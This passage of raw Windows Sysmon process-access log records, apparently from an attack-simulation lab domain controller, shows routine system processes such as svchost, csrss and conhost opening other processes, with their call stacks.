\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001478Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.239{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001477Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.239{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001476Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.239{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001475Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.238{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001474Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.236{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001473Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.236{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001472Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.236{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001471Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.236{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001470Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.236{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001469Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.236{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001468Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.236{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001467Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.235{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001466Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.235{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001465Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.231{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001464Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.231{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001463Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.231{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001462Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.230{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001461Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.230{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001460Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.230{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001459Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.230{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001458Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.230{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001457Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.230{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001456Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.225{08A6967A-4299-6000-3D00-000000009A01}38003820C:\Windows\system32\conhost.exe{08A6967A-4299-6000-3C00-000000009A01}3792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001455Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.217{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4299-6000-3D00-000000009A01}3800C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001454Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:45.214{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001453Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 